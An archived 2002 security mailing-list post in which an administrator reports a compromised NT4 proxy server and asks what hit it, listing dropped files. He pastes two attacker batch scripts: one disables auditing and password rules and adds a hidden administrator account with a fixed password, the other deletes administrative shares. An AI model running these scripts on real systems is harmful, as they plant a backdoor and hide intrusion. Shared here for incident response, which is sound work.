Proxy server hit... Any ideas?

From: Mike Cain (mikec@lpinsurance.com)
Date: 11/18/02

  • Next message: Greg A. Woods: "Re: Compromised FBSD/Apache"
    From: "Mike Cain" <mikec@lpinsurance.com>
    To: <incidents@securityfocus.com>
    Date: Mon, 18 Nov 2002 08:00:43 -0600
    
    

    Well, I have had my first run-in with a hacker, or was it a virus? I'm
    not 100% sure.. Guess I should start from the beginning...

    A days ago, I began to get user complaints on the slowness of the
    internet. I figured it was mostly them just wanting something to
    complain about, so I did what all crappy admins do, I ignored it. Well,
    last night the box was rebooted after some software was updated. Today
    people were complaining about how PAINFULLY slow the internet was, so I
    looked at the proxy server. NT4 running proxy3. I know, there is newer
    better stuff, but its what I have to work with. :) SO... I looked at the
    processes and noticed the CPU hovering at 35-50%.. Way too high. So a
    quick look at the process list showed two things that I didn't remember
    needing to be there, win.exe and start.exe. Next move was to find them,
    and they were in the winnt\system\ folder. What I also found odd was
    that there were three new folders in that directory all created on the
    8th, NT, tools, and win.

    Here are the contents, respectively.
    1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a
    backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll
    (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup

    2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
    srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
    Routine), and _zoLibr.dll

    3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
    x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll,
    win.exe, x32.dll.bkup

    SO, anyone know what I have or what hit me? From looking at the sercure
    and secure1 batch files, it looks like a root kit... But I'mm new at
    this side of security I'mm aCiscoo guy...)

    Last thing, the logs show that the attacker was hitting the
    \scripts\sample\ folder... Meaning I think he was trying to use the old
    IIS Sample Scripts to execute local code... Not sure if he was
    successful...

    Thanks in advance!!

    Mike Cain
    CCNP/MCSE

    Secure.bat =
    @echo off
    del temp
    echo Compiling New Security Policy ...
    echo [Version] >> temp
    echo signature="$CHICAGO$" >> temp
    echo Revision=1 >> temp
    echo [Profile Description] >> temp
    echo Description=Default Security Settings. (Windows 2000 Professional)
    >> temp
    echo [System Access] >> temp
    echo MinimumPasswordAge = 0 >> temp
    echo MaximumPasswordAge = 42 >> temp
    echo MinimumPasswordLength = 0 >> temp
    echo PasswordComplexity = 0 >> temp
    echo PasswordHistorySize = 0 >> temp
    echo LockoutBadCount = 0 >> temp
    echo RequireLogonToChangePassword = 0 >> temp
    echo ClearTextPassword = 0 >> temp
    echo [Event Audit] >> temp
    echo AuditSystemEvents = 0 >> temp
    echo AuditLogonEvents = 0 >> temp
    echo AuditObjectAccess = 0 >> temp
    echo AuditPrivilegeUse = 0 >> temp
    echo AuditPolicyChange = 0 >> temp
    echo AuditAccountManage = 0 >> temp
    echo AuditProcessTracking = 0 >> temp
    echo AuditDSAccess = 0 >> temp
    echo AuditAccountLogon = 0 >> temp
    echo [Registry Values] >> temp
    echo
    machine\system\currentcontrolset\services\netlogon\parameters\signsecure
    channel=4,1 >> temp
    echo
    machine\system\currentcontrolset\services\netlogon\parameters\sealsecure
    channel=4,1 >> temp
    echo
    machine\system\currentcontrolset\services\netlogon\parameters\requirestr
    ongkey=4,0 >> temp
    echo
    machine\system\currentcontrolset\services\netlogon\parameters\requiresig
    norseal=4,0 >> temp
    echo
    machine\system\currentcontrolset\services\netlogon\parameters\disablepas
    swordchange=4,0 >> temp
    echo
    machine\system\currentcontrolset\services\lanmanworkstation\parameters\r
    equiresecuritysignature=4,0 >> temp
    echo
    machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
    nablesecuritysignature=4,1 >> temp
    echo
    machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
    nableplaintextpassword=4,0 >> temp
    echo
    machine\system\currentcontrolset\services\lanmanserver\parameters\requir
    esecuritysignature=4,0 >> temp
    echo
    machine\system\currentcontrolset\services\lanmanserver\parameters\enable
    securitysignature=4,0 >> temp
    echo
    machine\system\currentcontrolset\services\lanmanserver\parameters\enable
    forcedlogoff=4,1 >> temp
    echo
    machine\system\currentcontrolset\services\lanmanserver\parameters\autodi
    sconnect=4,15 >> temp
    echo machine\system\currentcontrolset\control\session
    manager\protectionmode=4,1 >> temp
    echo machine\system\currentcontrolset\control\session manager\memory
    management\clearpagefileatshutdown=4,0 >> temp
    echo machine\system\currentcontrolset\control\print\providers\lanman
    print services\servers\addprinterdrivers=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
    >> temp
    echo
    machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >>
    temp
    echo
    machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
    >> temp
    echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
    >> temp
    echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
    >> temp
    echo
    machine\software\microsoft\windows\currentversion\policies\system\shutdo
    wnwithoutlogon=4,1 >> temp
    echo
    machine\software\microsoft\windows\currentversion\policies\system\legaln
    oticetext=1, >> temp
    echo
    machine\software\microsoft\windows\currentversion\policies\system\legaln
    oticecaption=1, >> temp
    echo
    machine\software\microsoft\windows\currentversion\policies\system\dontdi
    splaylastusername=4,0 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\winlogon\scremoveoption=1,0 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\winlogon\allocatedasd=1,0 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
    echo machine\software\microsoft\windows
    nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
    echo [Privilege Rights] >> temp
    echo seassignprimarytokenprivilege = >> temp
    echo seauditprivilege = >> temp
    echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    echo sebatchlogonright = >> temp
    echo sechangenotifyprivilege =
    *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
    echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
    echo secreatepermanentprivilege = >> temp
    echo secreatetokenprivilege = >> temp
    echo sedebugprivilege = *S-1-5-32-544 >> temp
    echo sedenybatchlogonright = >> temp
    echo sedenyinteractivelogonright = >> temp
    echo sedenynetworklogonright = >> temp
    echo sedenyservicelogonright = >> temp
    echo seenabledelegationprivilege = >> temp
    echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
    echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
    echo seinteractivelogonright =
    *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040
    8961-1637723038-1801674531-501 >> temp
    echo seloaddriverprivilege = *S-1-5-32-544 >> temp
    echo selockmemoryprivilege = >> temp
    echo semachineaccountprivilege = >> temp
    echo senetworklogonright = %1 >> temp
    echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >>
    temp
    echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
    echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    echo sesecurityprivilege = *S-1-5-32-544 >> temp
    echo seservicelogonright = >> temp
    echo seshutdownprivilege =
    *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
    echo sesyncagentprivilege = >> temp
    echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
    echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
    echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    echo setakeownershipprivilege = *S-1-5-32-544 >> temp
    echo setcbprivilege = >> temp
    echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >>
    temp
    echo Adding User %1 with the Password %2 ...
    net user /add slash 971985
    echo Adding slash to the Local Administrator Group ...
    net localgroup administrators slash /add
    echo Loading New Security Policy ...
    secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb
    /CFG temp
    echo System is now secure.

    Secure1.bat

    net share /delete C$ /y > net.deld
    net share /delete D$ /y >> net.deld
    net share /delete E$ /y >> net.deld
    net share /delete F$ /y >> net.deld
    net share /delete G$ /y >> net.deld
    net share /delete H$ /y >> net.deld
    net share /delete I$ /y >> net.deld
    net share /delete J$ /y >> net.deld
    net share /delete K$ /y >> net.deld
    net share /delete L$ /y >> net.deld
    net share /delete M$ /y >> net.deld
    net share /delete N$ /y >> net.deld
    net share /delete O$ /y >> net.deld
    net share /delete P$ /y >> net.deld
    net share /delete Q$ /y >> net.deld
    net share /delete R$ /y >> net.deld
    net share /delete S$ /y >> net.deld
    net share /delete T$ /y >> net.deld
    net share /delete U$ /y >> net.deld
    net share /delete V$ /y >> net.deld
    net share /delete W$ /y >> net.deld
    net share /delete X$ /y >> net.deld
    net share /delete Y$ /y >> net.deld
    net share /delete Z$ /y >> net.deld
    net share /delete ADMIN$ /y >> net.deld
    #net share /delete IPC$ /y >> net.deld
    del net.deld

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com



    Relevant Pages

    • RE: Proxy server hit... Any ideas?
      ... More so just using it as another server to add to their list. ... echo Compiling New Security Policy ... ... echo >> temp ... This list is provided by the SecurityFocus ARIS analyzer service. ...
      (Incidents)
    • RE: Proxy server hit... Any ideas?
      ... troll the internet looking for unpatched NT boxen to use as rogue FTP ... don't know security and got hit...what did I get?" ... > echo Description=Default Security Settings. ... >>> temp ...
      (Incidents)
    • Re: Proxy server hit... Any ideas?
      ... troll the internet looking for unpatched NT boxen to use as rogue FTP ... don't know security and got hit...what did I get?" ... > del temp ... > echo Compiling New Security Policy ... ...
      (Incidents)
    • Re: How to delete temp files
      ... You will always get "File in use" messages, because some temp ... @echo off ... echo Cleaning out the Temp directory ... I would like a script that I can click on and have it delete all the files in the temp directory. ...
      (microsoft.public.windows.server.scripting)
    • Re: Text::Aspell
      ... echo Aberystwyth>> words ... -bash-3.00$ mkdir temp ... Use of uninitialized value in array element at chas.pl line 18. ...
      (perl.beginners)